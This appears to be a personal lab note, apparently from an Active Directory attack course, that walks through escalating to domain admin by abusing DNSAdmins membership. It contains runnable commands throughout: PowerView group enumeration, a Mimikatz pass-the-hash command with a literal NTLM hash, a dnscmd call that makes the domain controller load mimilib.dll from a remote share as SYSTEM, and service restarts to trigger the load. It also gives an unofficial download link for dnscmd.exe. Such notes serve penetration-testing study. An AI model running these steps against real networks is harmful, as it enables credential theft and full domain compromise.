Priv Esc – DNSAdmins

DNSAdmins

#It is possible for the members of the DNSAdmins group to load arbitrary
#DLL with the privileges of dns.exe (SYSTEM).
#In case the DC also serves as DNS, this will provide us escalation to DA.
#Need privileges to restart the DNS service.



Import-Module powerview.ps1

#pull the members of DNSAdmins Group
Get-NetGroupMember DNSAdmins


#Once we know the members of the DNSAdmins group, we need to
#compromise a the member of DNsAmins Group, which is in this case srvadmin.
# We already have hash of srvadmin because of derivative local admin.


#create a folder in our local computer in the C: and call it dll:
#share it with everyone and add the mimilib.dll inside the folder


#once we have the hash of the member of the DNSAdmins, in this case srvadmin
#We can invoke mimikatz:
#Open Powershell as local administrator> IMPORTANT!!
Import-module Invoke-mimikatz
Invoke-Mimikatz -Command '"sekurlsa::pth /user:srvadmin /domain:dollarcorp.moneycorp.local /ntlm:a98e18228819e8eec3dfa33cb68b0728 /run:powershell.exe"'

#From the privileges of DNSAdmins group member, configure DLL using
#dnscmd dcorp-dc /config /serverlevelplugindll \\172.16.50.100\dll\mimilib.dll
#dnscmd.exe (needs RSAT DNS):

#or it can be downloaded from here:
#https://api.256file.com/dnscmd.exe/m-download-233611.html
#and place it on C:\Windows\system32

dnscmd dcorp-dc /config /serverlevelplugindll \\172.16.50.100\dll\mimilib.dll


#Restart the DNS Service

sc \\dcorp-dc stop dns
sc \\dcorp-dc start dns

#By default, the mimilib.dll logs all DNS queries to C:\Windows\System32\kiwidns.log